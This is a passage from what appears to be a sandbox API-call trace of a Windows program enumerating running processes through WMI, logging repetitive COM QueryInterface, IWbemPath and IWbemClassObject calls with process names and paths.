[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fc0f8) returned 0x0 [0279.246] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fc0f8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.246] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fc0f8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5702190) returned 0x0 [0279.246] WbemDefPath:IUnknown:Release (This=0x56fc0f8) returned 0x0 [0279.246] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702190, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5702190) returned 0x0 [0279.246] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702190, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.247] WbemDefPath:IUnknown:AddRef (This=0x5702190) returned 0x3 [0279.247] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702190, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.247] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702190, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.247] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702190, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fc108) returned 0x0 [0279.247] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fc108, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.247] WbemDefPath:IUnknown:Release (This=0x56fc108) returned 0x3 [0279.247] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.247] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.247] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702190, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.247] WbemDefPath:IUnknown:Release (This=0x5702190) returned 0x2 [0279.247] WbemDefPath:IUnknown:Release (This=0x5702190) returned 0x1 [0279.247] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.247] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.247] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702190, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5702190) returned 0x0 [0279.247] WbemDefPath:IUnknown:AddRef (This=0x5702190) returned 0x3 [0279.247] WbemDefPath:IUnknown:Release (This=0x5702190) returned 0x2 [0279.247] WbemDefPath:IWbemPath:SetText (This=0x5702190, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2420\"") returned 0x0 [0279.247] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.247] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.247] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.247] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.247] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.247] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.248] IWbemClassObject:Get (in: This=0x5703818, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c5440*=0, plFlavor=0x27c5444*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="special avoid share.exe", varVal2=0x0), pType=0x27c5440*=8, plFlavor=0x27c5444*=0) returned 0x0 [0279.248] SysStringByteLen (bstr="special avoid share.exe") returned 0x2e [0279.248] SysStringByteLen (bstr="special avoid share.exe") returned 0x2e [0279.248] IWbemClassObject:Get (in: This=0x5703818, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c5440*=8, plFlavor=0x27c5444*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="special avoid share.exe", varVal2=0x0), pType=0x27c5440*=8, plFlavor=0x27c5444*=0) returned 0x0 [0279.248] SysStringByteLen (bstr="special avoid share.exe") returned 0x2e [0279.248] SysStringByteLen (bstr="special avoid share.exe") returned 0x2e [0279.248] CoTaskMemAlloc (cb=0x4) returned 0x56fc138 [0279.248] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fc138, puReturned=0x27bb39c | out: apObjects=0x56fc138*=0x57039b0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.249] IUnknown:QueryInterface (in: This=0x57039b0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x57039b0) returned 0x0 [0279.249] IUnknown:QueryInterface (in: This=0x57039b0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.249] IUnknown:QueryInterface (in: This=0x57039b0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.249] IUnknown:AddRef (This=0x57039b0) returned 0x3 [0279.249] IUnknown:QueryInterface (in: This=0x57039b0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.249] IUnknown:QueryInterface (in: This=0x57039b0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.249] IUnknown:QueryInterface (in: This=0x57039b0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x57039b4) returned 0x0 [0279.249] IMarshal:GetUnmarshalClass (in: This=0x57039b4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.249] IUnknown:Release (This=0x57039b4) returned 0x3 [0279.249] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.249] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.249] IUnknown:QueryInterface (in: This=0x57039b0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.250] IUnknown:Release (This=0x57039b0) returned 0x2 [0279.250] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.250] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.250] IUnknown:QueryInterface (in: This=0x57039b0, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x57039b0) returned 0x0 [0279.250] IUnknown:AddRef (This=0x57039b0) returned 0x4 [0279.250] IUnknown:Release (This=0x57039b0) returned 0x3 [0279.250] IUnknown:Release (This=0x57039b0) returned 0x2 [0279.250] CoTaskMemFree (pv=0x56fc138) [0279.250] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.250] IUnknown:AddRef (This=0x57039b0) returned 0x3 [0279.250] IWbemClassObject:Get (in: This=0x57039b0, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.250] IWbemClassObject:Get (in: This=0x57039b0, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2432\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.250] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2432\"") returned 0x66 [0279.250] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2432\"") returned 0x66 [0279.251] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.251] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.251] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.251] IUnknown:Release (This=0x500344) returned 0x1 [0279.251] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fc138) returned 0x0 [0279.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fc138, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.252] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fc138, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5702270) returned 0x0 [0279.252] WbemDefPath:IUnknown:Release (This=0x56fc138) returned 0x0 [0279.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702270, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5702270) returned 0x0 [0279.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702270, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.252] WbemDefPath:IUnknown:AddRef (This=0x5702270) returned 0x3 [0279.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702270, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702270, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702270, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fc148) returned 0x0 [0279.252] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fc148, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.252] WbemDefPath:IUnknown:Release (This=0x56fc148) returned 0x3 [0279.252] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.252] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702270, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.253] WbemDefPath:IUnknown:Release (This=0x5702270) returned 0x2 [0279.253] WbemDefPath:IUnknown:Release (This=0x5702270) returned 0x1 [0279.253] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.253] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.253] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702270, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5702270) returned 0x0 [0279.253] WbemDefPath:IUnknown:AddRef (This=0x5702270) returned 0x3 [0279.253] WbemDefPath:IUnknown:Release (This=0x5702270) returned 0x2 [0279.253] WbemDefPath:IWbemPath:SetText (This=0x5702270, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2432\"") returned 0x0 [0279.253] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.253] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.253] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.253] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.253] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.253] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.253] IWbemClassObject:Get (in: This=0x57039b0, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c5cdc*=0, plFlavor=0x27c5ce0*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="collection.exe", varVal2=0x0), pType=0x27c5cdc*=8, plFlavor=0x27c5ce0*=0) returned 0x0 [0279.253] SysStringByteLen (bstr="collection.exe") returned 0x1c [0279.253] SysStringByteLen (bstr="collection.exe") returned 0x1c [0279.253] IWbemClassObject:Get (in: This=0x57039b0, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c5cdc*=8, plFlavor=0x27c5ce0*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="collection.exe", varVal2=0x0), pType=0x27c5cdc*=8, plFlavor=0x27c5ce0*=0) returned 0x0 [0279.253] SysStringByteLen (bstr="collection.exe") returned 0x1c [0279.253] SysStringByteLen (bstr="collection.exe") returned 0x1c [0279.253] CoTaskMemAlloc (cb=0x4) returned 0x56fc178 [0279.254] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fc178, puReturned=0x27bb39c | out: apObjects=0x56fc178*=0x5703b48, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.299] IUnknown:QueryInterface (in: This=0x5703b48, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5703b48) returned 0x0 [0279.299] IUnknown:QueryInterface (in: This=0x5703b48, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.299] IUnknown:QueryInterface (in: This=0x5703b48, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.299] IUnknown:AddRef (This=0x5703b48) returned 0x3 [0279.299] IUnknown:QueryInterface (in: This=0x5703b48, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.299] IUnknown:QueryInterface (in: This=0x5703b48, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.299] IUnknown:QueryInterface (in: This=0x5703b48, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5703b4c) returned 0x0 [0279.300] IMarshal:GetUnmarshalClass (in: This=0x5703b4c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.300] IUnknown:Release (This=0x5703b4c) returned 0x3 [0279.300] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.300] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.300] IUnknown:QueryInterface (in: This=0x5703b48, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.300] IUnknown:Release (This=0x5703b48) returned 0x2 [0279.300] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.300] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.300] IUnknown:QueryInterface (in: This=0x5703b48, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5703b48) returned 0x0 [0279.300] IUnknown:AddRef (This=0x5703b48) returned 0x4 [0279.300] IUnknown:Release (This=0x5703b48) returned 0x3 [0279.300] IUnknown:Release (This=0x5703b48) returned 0x2 [0279.300] CoTaskMemFree (pv=0x56fc178) [0279.300] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.301] IUnknown:AddRef (This=0x5703b48) returned 0x3 [0279.301] IWbemClassObject:Get (in: This=0x5703b48, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.301] IWbemClassObject:Get (in: This=0x5703b48, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2444\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.301] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2444\"") returned 0x66 [0279.301] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2444\"") returned 0x66 [0279.301] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 